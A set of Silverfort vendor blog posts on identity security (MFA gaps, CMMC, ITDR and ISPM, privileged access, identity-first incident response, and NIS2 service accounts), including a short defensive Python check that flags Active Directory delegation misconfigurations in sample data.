DNS Admins manage critical network infrastructure components, specifically DNS servers. Since the DNS Admin group is set up as a privileged group without additional protection on-premises, an attacker could easily reset the password of a DNS Admin group member via Entra. This would give them full control over that account in the on-premises environment.

With control of a DNS Admin account, the attacker could significantly disrupt network operations. They might modify DNS records to redirect internal network traffic, perform Man-in-the-Middle (MITM) attacks by rerouting traffic through servers they control, or alter DNS settings to send users to malicious websites.

Figure: MSOL user had the Reset Password permission on the DnsAdmins group

#### Group Policy Creator Owners

Group Policy Creator Owners is another example of a group that could be a privileged group without additional protection. Members of this group can modify Group Policy Objects...

---
- Published: 2024-10-23
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/identity-under-siege-why-attackers-are-targeting-mfa-gaps-and-how-to-respond/

Cyberattacks are becoming more frequent and sophisticated, with identity as the main target for threat actors and ransomware-as-a-service (RaaS) providers. A staggering 83% of organizations have experienced breaches involving compromised credentials, a clear indicator that identity-based attacks are becoming the go-to strategy for attackers. This alarming statistic forms the foundation of the AIG & Silverfort white paper, "Identity Has Become the Prime Target of Threat Actors", which sheds light on how attackers are exploiting gaps in identity and access management (IAM) strategies, especially where multi-factor authentication (MFA) is either misconfigured or not fully deployed.

### Why Identity Is the New Battleground

The increasing reliance on users' identities across cloud, hybrid and on-prem environments has turned identity into a critical security battleground.
Once considered secure with basic MFA in place, credentials have become a common point of entry for cybercriminals. Attackers are finding ways to bypass traditional MFA methods, whether through phishing, social engineering or direct compromise.

One of the primary reasons for this security gap is the incomplete implementation or misconfiguration of MFA across critical systems, including legacy infrastructure and privileged accounts. MFA coverage is typically limited to web-based and cloud-based applications, leaving older systems and administrative resources unprotected. The gap provides attackers with a direct pathway for infiltrating networks, escalating privileges and deploying ransomware.

### The Challenges of Implementing MFA

While MFA is widely recognized as one of the most effective defenses against identity-based attacks, many organizations struggle to implement it comprehensively. Some of the key challenges include:

- Legacy Systems Don't Support MFA: Older systems and applications do not natively support MFA, making it difficult for organizations to secure these resources without significant infrastructure upgrades.
- Outdated, Insecure Authentication Protocols: Protocols like NTLM and Kerberos, still used in many on-prem environments, were not designed with modern security controls in mind. They leave significant gaps in protection that MFA doesn't always cover.
- Misconfigurations: Even where MFA is in place, misconfigurations can leave systems vulnerable to compromise. For example, MFA may be applied at the perimeter while privileged accounts, arguably the most critical, lack proper protection within the internal network.
- Agent-Based Limitations: Traditional MFA implementations often rely on agents or proxies that are difficult to deploy across diverse infrastructures, leading to coverage gaps.
### The Consequences of Incomplete MFA

The AIG & Silverfort white paper highlights several real-world examples where MFA failures led to devastating breaches. In one instance, a company's employee credentials were compromised through a Citrix gateway that wasn't protected by MFA. By compromising a privileged account, the attackers gained access to the network, moved laterally within it, and eventually deployed ransomware.

There is a critical lesson in this example: MFA gaps, particularly in privileged access management (PAM), can have catastrophic consequences. With access to a privileged account, attackers can easily execute ransomware or exfiltrate data. Clorox, MOVEit Transfer software, Zellis payroll software, and Change Healthcare are other notable breaches that could have been prevented with a unified approach to MFA.

### Addressing MFA Gaps: A Unified Approach

To combat these security gaps, the AIG & Silverfort white paper emphasizes the need for a unified, comprehensive approach to MFA. Rather than applying MFA selectively or relying on outdated methods, organizations should extend MFA coverage across all resources: cloud, on-premises, legacy systems, and privileged accounts. This involves:

- Assessing and closing gaps: Conduct a thorough risk analysis to identify misconfigurations and areas where MFA is absent.
- Prioritizing privileged accounts: Protect administrative and other privileged accounts with stringent MFA policies.
- Protocol-agnostic solutions: Implement MFA solutions that work across all types of authentication protocols, including older systems that use insecure protocols and don't support modern MFA natively.
- Phishing-resistant MFA: Apply advanced MFA methods that resist phishing and social engineering, such as hardware tokens or biometric authentication, rather than relying on SMS-based or telephony-based MFA, which can be intercepted.
### Preparing for the Future of Identity-Based Attacks

Identity will remain a key target for attackers, and without comprehensive MFA coverage, organizations leave themselves vulnerable to increasingly sophisticated attacks. By adopting a holistic, unified MFA strategy, companies can significantly reduce their risk of identity-based breaches. Cybersecurity professionals and cyber insurance stakeholders alike must take proactive steps to ensure that every access point, especially those involving privileged accounts, is properly protected. As the threat landscape evolves, so must our defenses, starting with closing the MFA gaps that attackers so often exploit.

---
- Published: 2024-10-21
- Modified: 2025-05-04
- URL: https://www.silverfort.com/blog/navigating-cmmc-compliance-how-silverfort-can-streamline-your-journey/

As the threat landscape evolves, attackers are setting their sights on organizations that work closely with critical national infrastructure and governmental agencies. With over 300,000 companies supplying the U.S. Department of Defense (DoD), any breach could pose a significant threat to national security. Organizations, especially those involved in this sprawling supply chain, need to know exactly who is accessing and sharing confidential data while balancing availability with security.

To answer these security challenges, the U.S. DoD created the Cybersecurity Maturity Model Certification (CMMC) to help strengthen the security posture of contractors and federal agencies. In this article, you will learn about the CMMC framework and how Silverfort can help organizations align with its identity security requirements. We will focus on the latest CMMC 2.0 model, which was released to the public in October 2024 and will be effective from December 2024.

### What is the CMMC Framework?

The CMMC framework was created by the U.S.
DoD in 2020 and is based on the industry-leading standards established by the National Institute of Standards and Technology (NIST). It was established to protect two key types of unclassified information disseminated throughout the Defense Industrial Base (DIB) and DoD supply chain:

- Federal Contract Information (FCI): "Information provided by or generated for the government under contract not intended for public release", as defined by the DoD.
- Controlled Unclassified Information (CUI): "Information that requires security of dissemination controls pursuant to and consistent with laws, regulation and government-wide policies", as defined by the DoD.

The CMMC framework consists of 3 certification levels that contractors within DIB sectors need to comply with to win bids on upcoming contracts:

#### Level 1: Foundational Cyber Hygiene

This level focuses on implementing fundamental practices with 15 security controls, including basic security measures such as regular password updates, the use of anti-malware solutions and safe browsing habits. The goal is to ensure companies put essential security controls in place to protect FCI from common threats.

#### Level 2: Advanced Cyber Hygiene

This stage introduces more advanced cybersecurity practices: the basic 17 practices from Level 1 plus an additional set of 93 practices derived from NIST SP 800-171. It covers security aspects such as access control, incident response and risk management. The goal is to start protecting CUI and to build a stronger security foundation for achieving higher levels of compliance.

#### Level 3: Expert Cyber Hygiene

At the highest level, organizations must implement a mature set of cybersecurity practices, comprising the 110 controls from Level 2 and an additional 24 requirements aligned with NIST SP 800-172 that are designed to manage and mitigate higher risks related to CUI.
This level includes advanced security controls such as continuous monitoring, proactive threat detection, and real-time response capabilities. The goal is to establish consistent, repeatable security processes to ensure effective security of CUI across all environments.

Let's focus on the identity security aspects of the CMMC framework.

### The Identity Security Aspects of CMMC

With the increasing frequency and complexity of cyberattacks targeting DIB contractors, securing access to sensitive data has never been more crucial for national security. One of the key elements of the CMMC framework is controlling access to classified systems and information by applying robust security controls. This includes implementing Multi-Factor Authentication (MFA), enforcing least-privilege principles, and regularly monitoring user activities to prevent unauthorized access. Effective identity security measures help organizations meet CMMC requirements, ultimately protecting their environments against insider threats and external cyberattacks.

To address the importance of identity security, the CMMC framework provides the following guidelines to organizations:

#### Access Control (AC)

Organizations must establish security policies that limit access to all systems and resources to only authorized users, devices, and processes based on their roles:

- Organizations should define and manage security policies for user access permissions and authorizations following least privilege.
- Organizations should manage all remote access authentications by routing them through secure access control points.
- Organizations should enforce user session controls, including session termination and prevention of unauthorized execution of privileged functions.
#### Audit and Accountability (AU)

Organizations must ensure that all user actions on information systems are traceable and auditable to maintain accountability:

- Organizations should enable system audit logging, with logs protected from unauthorized access and modification, to ensure user actions are traceable.
- Organizations should review and analyze audit logs regularly and automate alerts for suspicious or unauthorized activities.
- Organizations should limit audit logging management to privileged users and ensure logs are reviewed and updated systematically for accurate monitoring.

#### Identity and Authentication (IA)

Organizations must identify and authenticate users, devices, and processes to ensure only verified identities can access sensitive systems:

- Organizations should verify all types of users, including human, machine-to-machine, and non-human identities, so that access to systems is granted only to authorized users.
- Organizations should enable multi-factor authentication for privileged accounts and non-privileged network access.
- Organizations should use replay-resistant authentication mechanisms to safeguard both privileged and non-privileged accounts from unauthorized access.

#### Incident Response (IR)

To cover the full incident lifecycle, including preparation, detection, analysis, and recovery, organizations must establish a robust incident-handling process:

- Organizations should perform root cause analysis and use forensic data to investigate incidents while protecting the integrity of that data.
- Organizations should combine manual and automated responses to quickly address and mitigate anomalous activities matching incident patterns.

#### System and Configuration Protection (SC)

Organizations must protect the integrity and authenticity of communication sessions and ensure that system management functions are isolated from user functions:

- Organizations should monitor and control network traffic by enforcing deny policies and protecting communication authenticity.
- Organizations should apply boundary protections and enforce compliance with network protocols and port usage to secure system communications.

### Become CMMC Compliant with Silverfort

#### 1. Access Control (AC)

Silverfort enables administrators to assign access control policies to each user, defining which resources, devices, or services the user can access. These policies can be enforced in real time based on specific user roles, including privileged accounts, risk scenarios, and organizational security policies. Silverfort's access control policies can be applied to every authentication within the organizational environment. By enforcing pre-defined policies, alerting, MFA, or blocking access can be enabled to protect insecure authentication to critical resources.

#### 2. Audit and Accountability (AU)

With Silverfort you can gain visibility into all authentication and access activity logs across all environments. Through integrations with SIEM tools, Silverfort provides continuous monitoring and review of all logged events, ensuring logs are regularly analyzed for anomalies or security incidents. Silverfort enables administrators to customize and update audit log policies, ensuring new types of events or threats are captured and the audit logs keep pace with evolving security requirements.

#### 3. Identity and Authentication (IA)

Silverfort authenticates every user's identity by enforcing strong MFA across all systems, even those that don't natively support modern authentication protocols. This ensures every user must verify their identity before accessing resources. By enforcing MFA and logging all user activities across all environments, Silverfort ensures no access is granted based on passwords alone; users are required to authenticate through MFA to verify that they are who they claim to be. Silverfort also provides an in-depth identity inventory that displays the types of users and resources in the organization's environment.
This enables organizations to quickly detect and respond to malicious activities, including blocking access for any account that displays anomalous behavior.

#### 4. Incident Response (IR)

Silverfort assists with incident analysis by providing detailed logs of all authentication and access activities. This allows security teams to understand what occurred during an incident and determine the root cause. Using comprehensive data on user access requests and behaviors, Silverfort facilitates a thorough investigation and understanding of the events leading up to and during a security incident. Silverfort's real-time monitoring capabilities enable it to detect anomalies and suspicious activities, providing insight into the course of an incident. As a result of this detailed analysis, it is possible to pinpoint the exact nature and origin of the problem, facilitating effective remediation and strengthening security overall.

#### 5. System and Configuration Protection (SC)

Silverfort monitors every access event, including access across the external and internal boundaries of the information systems. It provides visibility into these access events and allows policies to be configured to control and protect these communications with advanced access controls and secure authentication.

Want to learn more about how Silverfort can help you address the identity security aspects of the CMMC framework? Download the whitepaper or schedule a call with one of our experts.

---
- Published: 2024-10-15
- Modified: 2024-10-16
- URL: https://www.silverfort.com/blog/itdr-and-ispm-the-best-of-both-worlds/

At first glance, Identity Threat Detection and Response (ITDR) and Identity Security Posture Management (ISPM) sound like two names for the same thing (because the one thing we really need in cybersecurity is more acronyms). While they do share some similarities, like a keen eye for trouble, they each play a very specific role in identity security and solve very different problems.
But that's exactly why they complement each other so well. In this article, we'll break down what each does, how they work together, and why you can't afford not to know the differences.

### ISPM: Proactively Reducing the Identity Attack Surface

ISPM's primary function is to increase visibility into your entire identity infrastructure, including users, resources and permissions, whether on-prem or in the cloud. While ITDR focuses on real-time response to ongoing threats, ISPM ensures your environment isn't full of exploitable weaknesses in the first place.

ISPM continuously assesses the state of your identity attack surface to identify weaknesses before they are targeted by an actual attack. These weaknesses might include misconfigurations, excessive privileges, poor practices and insecure legacy infrastructure. For example, accounts configured with unconstrained delegation are ideal targets for privilege escalation, something attackers are always interested in because it lets them acquire higher-level permissions. ISPM, however, can detect such misconfigurations and alert the identity team, giving them the opportunity to fix, or at least mitigate, the issue before any attack is launched.

### ITDR: Identifying Ongoing Attacks

ITDR is a security solution purpose-built to detect and respond to identity-related TTPs (Tactics, Techniques, and Procedures, as defined by MITRE ATT&CK) targeting credential access, privilege escalation, or lateral movement. For example, attackers often use compromised credentials to gain initial access to an environment, move laterally and spread ransomware. It's ITDR's job to detect this flow while it is in progress and, crucially, stop it before too much damage is done. Think of ITDR as an identity watchdog, watching closely over all authentications and access attempts in real time to spot potentially malicious presence and activity, such as attempts to access sensitive resources from unauthorized locations.
When a threat is detected, ITDR should trigger a response, such as alerting the security team or, even better, locking down the affected accounts, and enable further investigation.

### ITDR & ISPM: Better Together

ITDR and ISPM are two sides of the same coin: mitigation and remediation. As such, they work best when combined. ISPM continuously monitors and hardens your identity infrastructure to reduce your attack surface, while ITDR detects and responds to active threats. Here's how they work together and why you need both:

| ITDR | ISPM |
| --- | --- |
| Detection of Anomalous Behavior: All users should have an individual behavioral profile and risk score, so ITDR can identify accounts that may have been compromised based on deviations from their normal behavior. | Visibility & Inventory: ISPM provides visibility into the organization's identity attack surface, maintains a detailed inventory of all users, and makes this data available for further exploration and investigation. |
| Detection of TTPs: ITDR can detect TTPs including Kerberoasting, Pass-the-Hash, Pass-the-Ticket, Brute Force, Credential Scanning, Lateral Movement, and more. | Risk Analysis & Remediation: ISPM analyzes, classifies, and prioritizes risks, and offers recommendations for posture remediation and improvement. |
| Investigation & Response: When a user displays suspicious behavior, ITDR can initiate automated response procedures, like blocking the user's access or quarantining compromised users or resources until an investigation is complete. For example, when an endpoint is attacked, ITDR can determine who logged in and which resources were used. | Identity Hygiene: ISPM gives an organization a 360-degree view of how it's performing on identity security. ISPM usually uses a scoring system to tell organizations where they stand; as problems are resolved, the ISPM score increases. |

### Applying Theory to Practice: Real-World Examples

This is not just theory.
Unfortunately, there are far too many real-world examples that illustrate why you need both ITDR and ISPM. In the 2024 Snowflake breach, for example, attackers used compromised credentials to gain access to critical data (you can read more about this breach here). ISPM could have played a major preventative role here. The investigation highlighted a serious absence of MFA – a key weakness that could have been flagged by ISPM and mitigated by enforcing stronger access controls before it became an issue. If the attackers had still succeeded in gaining access to their systems, ITDR would likely have detected it much sooner and given their security teams a head start.

Similarly, the 2023 MOVEit Improper Authentication Vulnerability led to authentication bypass and affected numerous organizations, including government agencies, using MOVEit file transfer. While ITDR and ISPM wouldn't necessarily have stopped the initial access, they could have detected the suspicious activity and significantly reduced its impact. For example, if attackers tried to move laterally or interact with systems or data outside of business hours or from unfamiliar locations, ITDR could have detected this. As for ISPM, it continuously assesses the environment to identify misconfigurations and flaws such as – as in this case – leaving an application like MOVEit accessible to unauthorized users without additional controls.

### Final Thoughts

ITDR and ISPM work best as a unified force. ISPM strengthens your identity security posture, making you aware of your identity weaknesses before potential attackers are, and ITDR gives you the chance to deal with identity threats as they unfold. By working together, they don't just address individual gaps – they fill in the missing pieces toward achieving a unified approach to identity security.
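As an added example (not Silverfort's code), here is a minimal ISPM-style posture check in Python over constructed Active Directory account records: it flags the unconstrained delegation misconfiguration discussed above, privileged accounts that have not been marked non-delegatable, and non-expiring passwords, then derives a score that rises as findings are fixed. The userAccountControl bit values are Microsoft's documented ones; the account names, severities and scoring weights are assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# userAccountControl flag bits as documented by Microsoft (real values).
ACCOUNTDISABLE = 0x2
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller computer account
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation ("trust for delegation to any service")
NOT_DELEGATED = 0x100000            # "account is sensitive and cannot be delegated"

@dataclass
class AdAccount:
    """The subset of directory attributes this check reads (constructed sample data)."""
    sam: str
    uac: int
    allowed_to_delegate_to: list[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo
    admin_count: int = 0             # adminCount=1 marks a protected (privileged) account
    protected_users: bool = False    # member of the Protected Users group

@dataclass(frozen=True)
class Finding:
    account: str
    issue: str
    severity: int                    # 1 (low) .. 3 (high); assumed weights

def assess(accounts: list[AdAccount]) -> list[Finding]:
    """Return posture findings for every enabled account."""
    findings: list[Finding] = []
    for a in accounts:
        if a.uac & ACCOUNTDISABLE:
            continue                 # a disabled account is not a live target
        is_dc = bool(a.uac & SERVER_TRUST_ACCOUNT)
        # TRUSTED_FOR_DELEGATION with no msDS-AllowedToDelegateTo list is unconstrained
        # delegation: tickets presented to this host can be reused against any service.
        # Domain controllers carry the flag by design, so they are excluded.
        if a.uac & TRUSTED_FOR_DELEGATION and not a.allowed_to_delegate_to and not is_dc:
            findings.append(Finding(a.sam, "unconstrained delegation", 3))
        # Privileged accounts should be marked sensitive (or be in Protected Users) so a
        # compromised delegating host cannot impersonate them.
        if a.admin_count == 1 and not (a.uac & NOT_DELEGATED) and not a.protected_users:
            findings.append(Finding(a.sam, "privileged account may be delegated", 2))
        if a.uac & DONT_EXPIRE_PASSWORD:
            findings.append(Finding(a.sam, "password never expires", 1))
    return findings

def posture_score(findings: list[Finding]) -> int:
    """ISPM-style score: 100 with nothing open, 10 points off per severity point."""
    return max(0, 100 - 10 * sum(f.severity for f in findings))

def sample_directory() -> list[AdAccount]:
    """Constructed sample, not data from any real directory."""
    return [
        AdAccount("DC01$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
        AdAccount("APPSRV01$", 0x1000 | TRUSTED_FOR_DELEGATION),   # 0x1000 = WORKSTATION_TRUST_ACCOUNT
        AdAccount("svc_backup", 0x200 | DONT_EXPIRE_PASSWORD),     # 0x200 = NORMAL_ACCOUNT
        AdAccount("svc_web", 0x200, allowed_to_delegate_to=["HTTP/app.corp.example"]),
        AdAccount("da.alice", 0x200, admin_count=1),
        AdAccount("da.bob", 0x200 | NOT_DELEGATED, admin_count=1),
        AdAccount("old.svc", 0x200 | DONT_EXPIRE_PASSWORD | ACCOUNTDISABLE),
    ]

def remediate(accounts: list[AdAccount]) -> list[AdAccount]:
    """Apply the fixes an ISPM tool would recommend for the delegation findings (in place)."""
    by_sam = {a.sam: a for a in accounts}
    for f in assess(accounts):
        if f.issue == "unconstrained delegation":
            by_sam[f.account].uac &= ~TRUSTED_FOR_DELEGATION   # or move to constrained delegation
        elif f.issue == "privileged account may be delegated":
            by_sam[f.account].uac |= NOT_DELEGATED
    return accounts

if __name__ == "__main__":
    accounts = sample_directory()
    for f in assess(accounts):
        print(f"[sev {f.severity}] {f.account}: {f.issue}")
    print("posture score:", posture_score(assess(accounts)))
    print("after remediation:", posture_score(assess(remediate(accounts))))
```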
---
- Published: 2024-10-09
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/hidden-threats-why-privileged-access-security-should-be-your-top-priority/

It’s no secret that privileged accounts can be an open door to security threats. Yet managing privileged access––not protecting the accounts and users that are entrusted with it––remains the primary focus for most organizations. This is, perhaps, due to the never-ending struggle of most PAM deployments. Whatever the reason, the threat landscape is evolving, and so must their focus. If organizations hope to prevent trust from turning into risk, then the next step of securing privileged access should be their new priority. In this blog, you will learn why managing privileged access alone is not sufficient and come away with the tools to build your own security-first privileged access strategy.

### The Evolution of Privileged Access Management (PAM)

Privileged Access Management (PAM) has become a critical component in managing organizations' privileged users and critical resources. At its core, PAM focuses on controlling, monitoring, and protecting privileged accounts—those with elevated access to sensitive systems and data. These accounts, which are often held by administrators, provide the keys to critical assets within an organization. Managing these accounts properly is essential to preventing unauthorized access, data breaches, and potential insider threats.

Over the years, PAM has evolved from a simple method of controlling access to a comprehensive system that integrates with other security tools and provides real-time monitoring. Organizations now employ advanced PAM systems that include automated workflows, password vaulting, session monitoring, and threat detection, giving security teams a greater degree of visibility and control over privileged user activities.
This evolution has been driven by increasing regulatory demands, the rise of sophisticated cyberattacks, and the growing complexity of IT environments. Although PAM has become the industry standard for managing privileged access, it is not without its challenges.

### Why Privileged Access Management Isn’t Enough

With the emergence of increasingly sophisticated cyber threats, relying solely on Privileged Access Management (PAM) is no longer sufficient to secure critical assets and users. The traditional approach to managing privileged accounts focuses on controlling and monitoring who has access, but it does not take into account the evolving threat landscape. It is becoming increasingly common for attackers to target privileged accounts with advanced tactics such as lateral movement, credential theft, and privilege escalation, bypassing many of the controls that PAM is designed to address. Organizations need to evolve from simply managing privileged access to implementing a more proactive approach, where security controls are put in place to protect critical resources and privileged users. This shift requires continuous monitoring, complete visibility into all privileged access, risk-based access control, and real-time response to suspicious activities. While PAM solutions try to mitigate threats like password sharing, weak passwords, and outdated access permissions, they often fall short in addressing advanced persistent threats (APTs) and zero-day vulnerabilities. By focusing on securing privileged accounts at every stage—not just managing their access—organizations can close the security gaps PAM leaves open and secure their most sensitive systems from increasingly sophisticated attacks.

### Real-Time Enforcement is the Key to Secure Privileged Access

A security-first approach to privileged access goes beyond the limitations of traditional PAM by addressing the full spectrum of threats associated with privileged accounts.
This approach is based on continuous monitoring, automated threat detection, and real-time response––in answer to PAM’s common challenges such as manual processes, poor visibility into real-time threats, and inconsistent enforcement of access policies. As a result, it is more effective at mitigating advanced attacks such as credential theft and lateral movement. Rather than merely managing access, it focuses on securing the privileged accounts themselves, providing a comprehensive and proactive defense against today's sophisticated cyber threats.

The following key features should be considered when choosing a solution to help you solve your PAM-related challenges and build a secure privileged access strategy:

- Discovery and Classification of Privileged Accounts: The ability to automate the detection and classification of privileged accounts ensures end-to-end visibility and continuous monitoring. It also helps detect whether regular accounts are being used for privileged tasks, enabling prompt action to mitigate risk.
- Applying Security Controls to Privileged Access: Enforcing security controls on privileged users and ensuring they have access only when necessary is a key component of privileged access security. Applying strong security controls such as Multi-Factor Authentication (MFA) and access denial can prevent unauthorized access.
- Real-Time Monitoring: With real-time monitoring of privileged access activity, you can audit and analyze actions taken by privileged users, making it easier to detect unusual behavior and respond immediately to suspicious activity, preventing breaches before they escalate.
- Implementing Time-Sensitive Access Policies: Enforcing Zero Standing Privileges (ZSP) and Just-In-Time (JIT) access policies for privileged accounts, granting access only when needed, minimizes persistent access risks and reduces the overall attack surface.
### Shifting the Mindset to Security-First for Privileged Access

To truly protect privileged users, organizations must shift their focus from simply managing access to prioritizing security through real-time enforcement. By emphasizing security-first strategies like real-time monitoring, automated controls, and just-in-time privileges, you can ensure privileged users are secure and access is tightly controlled. This approach not only reduces risks but also closes security gaps, creating a more resilient environment where security is prioritized over management.

---
- Published: 2024-09-30
- Modified: 2025-02-21
- URL: https://www.silverfort.com/blog/introducing-silverforts-identity-first-incident-response-block-lateral-movement-detect-compromised-accounts-and-accelerate-recovery/

Today I’m excited to announce Silverfort’s Identity-First Incident Response (IR) Solution, which flips the script on the traditional IR process by starting with finding and isolating compromised user identities. Rather than focusing on malware-infected machines first, our solution allows IR teams to quickly identify and contain compromised user identities, the most common entry point for attackers. Designed to complement existing IR tools, this proactive approach drastically reduces the time to contain an attack, minimizes damage, and enables faster recovery.

By starting with identity, IR teams can detect and block authentication attempts to pinpoint compromised accounts and instantly isolate them. This approach allows for quicker identification of threats compared to traditional methods, which often begin with the lengthy and complex process of tracking down infected machines or monitoring network traffic. Once attackers gain access, they can move laterally through your network. Focusing on identity will help reduce damage more quickly and effectively than examining endpoints first.
Eric Haller, Silverfort advisor and former VP of SecOps & GRC at Palo Alto Networks, explains it best:

“Identifying impacted assets while responding to large incidents involving lateral movement is a serious challenge. Often, when deploying containment actions, practitioners must make difficult decisions with incomplete information, balancing attacker damage against business disruption. Being able to immediately challenge all authentication events while allowing business operations to continue is like a surgeon slowing a patient’s heartbeat to perform surgery. You can effectively put an entire company ‘under’ while you investigate the source of the issue – without killing productivity. With Silverfort, teams get actionable telemetry about what needs to be contained so they can keep their businesses operational while they investigate and figure out the best path towards recovery and remediation.”

### How Silverfort Accelerates Incident Response Times

Silverfort’s Identity-First IR solution seamlessly integrates with Identity and Access Management (IAM) systems like Active Directory, Okta, PingFederate and others, enabling responders to isolate compromised accounts, contain attacks in real time and block further spread, all without needing an extensive investigation.

Here’s a step-by-step breakdown of how Silverfort accelerates incident response:

#### Step 1: Bring the Attack to an Immediate Halt

Using MFA and identity-based segmentation, organizations can take immediate control over malicious access with Silverfort. This containment stops lateral movement in its tracks, even through tools like PowerShell or PsExec, without requiring deep manual investigation upfront. Blocking access happens instantly to prevent further spread. With Silverfort’s Authentication Firewall, organizations can block access to resources based on user identity and real-time authentication analysis.
#### Step 2: Rapidly Identify Compromised Accounts

Attackers will reveal themselves by triggering denied access attempts or blocked MFA challenges. Silverfort provides detailed audit trails so security teams can trace the attacker’s movements back to patient zero. By locating compromised identities early, responders can block further malicious activity and focus their forensic efforts on critical areas.

#### Step 3: Gradual Recovery and Attack Surface Reduction

As responders eradicate malicious activity, Silverfort helps gradually restore user access while maintaining critical security measures. The platform identifies identity-related weaknesses, such as shadow admins and unmonitored service accounts, to close security gaps and eliminate potential attack paths.

[Figure: Silverfort’s identity-first IR process]

### Customer Testimonial: Proven in Real-World Scenarios

One notable example of IR responders successfully using our solution comes from a Fortune 100 financial services company that recently experienced a significant breach. The attackers gained access to critical systems, threatening the security of their environment. The IR team deployed our solution across more than 100 domain controllers in under 12 hours, enforcing an access block policy for all users and resources. This rapid response contained the attack at its current state and prevented further ransomware spread.

#### Rapid containment and threat detection

“Silverfort immediately helped us mitigate the impact of compromised users. It was one of the most significant tools we used to analyze authentication flows and determine compromised identities as we brought our Domain Controllers back online,” said an identity leader at the company. “We worked quickly with the IR team to put blocking policies in place over the compromised identities.”

This real-world case study demonstrates how our identity-first approach drastically shortens incident response timelines, from days and weeks to mere hours, so organizations can recover with minimal disruption.

### Integration with Existing Tools and Infrastructure

We designed our solution to complement existing IR tools and to integrate seamlessly with security operations infrastructure, such as SIEM, SOAR and XDR platforms. Identity-related threat signals enrich existing incident response processes, enhancing the detection and correlation of risk signals across the entire infrastructure.

In crisis scenarios, our Authentication Firewall acts as a “kill switch” by analyzing every authentication and access attempt to critical resources and denying requests from compromised identities. By triggering these policies, IR teams can contain the attack, block further access, and continue investigating with full visibility into what has been compromised.

Silverfort’s real-time blocking policies, forensic insights, and MFA enforcement not only stop an attack in its tracks but also provide the IR team with actionable data to ensure secure recovery.

### Expedite Incident Response with Silverfort

Silverfort’s Identity-First Incident Response provides a fresh approach to IR – one that’s faster, more precise, and incredibly effective. By focusing on compromised identities rather than infected machines, security teams stay ahead of attackers. The result? Shorter recovery times, reduced damage, and the confidence to tackle even the most sophisticated threats.

For organizations looking to modernize their incident response strategies, we’re excited to offer a powerful, proven solution that integrates seamlessly with existing infrastructure while delivering unparalleled protection against identity-based attacks. Interested in learning more? Check out our IR playbook or request a demo. Our team will be with you every step of the way.
---
- Published: 2024-09-27
- Modified: 2024-10-01
- URL: https://www.silverfort.com/blog/comment-securiser-les-processus-automatiques-selon-la-transposition-francaise-de-nis2/

The ANSSI reference framework published by MagIT for entities subject to the NIS2 directive in France refers several times to the risks associated with access by "automatic processes".

Objective #10: The entity secures remote access to its regulated information systems

In the absence of such an objective, the entity is exposed, for example, to theft of authentication secrets and to illegitimate access to its regulated information systems (SIR) via the legitimate remote access of the entity's staff, automatic processes or the entity's service providers, potentially leading to the degradation or even interruption of the activities or services it provides, or to the disclosure of sensitive information.

Objective #13: The entity manages the identities and access of users to its regulated information systems

Meeting this objective allows the entity to control the users accessing its regulated information systems, whether they are internal or external to the entity (for example: service providers), as well as automatic processes (for example: monitoring or backup agents), through state-of-the-art identification and authentication mechanisms. Meeting this objective also allows the entity to control access so that these users access only the resources needed to carry out their duties.

What does ANSSI mean by this expression? It clearly refers to service accounts: fully fledged accounts in corporate directories, a priori indistinguishable from ordinary employee accounts. But unlike "human" accounts, these service accounts perform predefined automated tasks. For example, a backup agent will authenticate every day at the same time to extract data from the regulated information system and save it to an external database in order to mitigate the damage of a ransomware attack. Because they operate between different computer systems without human intervention, such access is often referred to by the English term "machine-to-machine".

In objective #13 of the NIS2 transposition, which applies to all entities (both "essential" and "important") covered by the directive, ANSSI requires the implementation of several measures intended to mitigate the risks associated with these "automatic processes". These include the following points:

- Users and automatic processes accessing the resources of the regulated information systems (SIR) of the important or essential entity have individual accounts. Users may, where appropriate, have several individual accounts.
- Use of an individual SIR account is reserved for the user or automatic process to which that account has been assigned.
- Where technical or operational reasons do not allow individual accounts to be created for users or automatic processes, the entity puts in place measures to reduce the risk associated with the use of shared accounts and to ensure traceability of the use of those accounts.
- The entity disables accounts that are no longer needed without delay.
- The entity protects the access of users and automatic processes to the resources of its regulated information systems (SIR) by means of an authentication mechanism (for example: a single- or multi-factor authentication mechanism) involving at least one secret element (for example: a knowledge factor such as a password).
- For each user or automatic process, the entity grants access rights only to the resources needed to carry out the entity's activities and services or to maintain operational or security conditions.
- Where technical or operational reasons do not allow the secret element to be changed, the entity implements appropriate access control for the resource concerned as well as measures to reduce the risk associated with the use of a fixed authentication secret.
- For each SIR resource, the entity grants access rights only to users and automatic processes with a justified need in light of their duties.

It is worth looking at the reasons behind such measures, and at the difficulties to overcome when implementing them. Finally, we will show how Silverfort can help meet these requirements simply and quickly.

### Why secure service accounts?

Service accounts are immune to several types of attacks that target human accounts. They cannot click on malicious links or be fooled by impersonation and phishing attempts. But that does not make them invulnerable. In fact, they are increasingly used in attack scenarios to carry out lateral movement. To mention a well-known example, consider the 2020 attack involving SolarWinds, which affected more than 18,000 of the company's customers (including Microsoft, Cisco and numerous US government departments). The Russian attackers, known as CozyBear, had planted a backdoor in the Orion software that SolarWinds sold to its customers, allowing them to infiltrate the information systems of every entity running the tool. The software in question used service accounts to scan the network and access other resources. CozyBear was thus easily able to exploit this access to spread and establish a foothold in its victims' environments.

This example illustrates very well the risks posed by machine access. It generally operates with little supervision. Its behaviour is completely predetermined and predictable: it generally runs at the same time, from the same source, to the same destination, at a regular interval (for example, every day at 3 pm) to carry out the "automatic process" entrusted to it. Since the process in question is often administrative in nature, it requires elevated privileges to be granted. For service accounts in the cloud, traceability is assured and monitoring teams can easily detect any abnormal behaviour. But in older on-premises infrastructure, the risks are higher. First, in the company's Active Directory, the only way to distinguish them from human accounts is through a specific naming convention. Second, it is difficult to monitor their day-to-day activity, change their passwords, or prevent an individual holding the account's credentials from accessing it freely. Finally, they cannot respond to a multi-factor authentication challenge, as human users do to ensure their account has not been hijacked. It is therefore easy to see why attackers, and ANSSI as well, consider service accounts a strategic target. By guessing or finding their passwords (sometimes carelessly stored on network file shares), these accounts become a master key allowing attackers to spread freely through their victims' infrastructure and install malicious code there. What measures can companies put in place to mitigate these risks? And what limits are they likely to encounter along the way?

### Obstacles to overcome

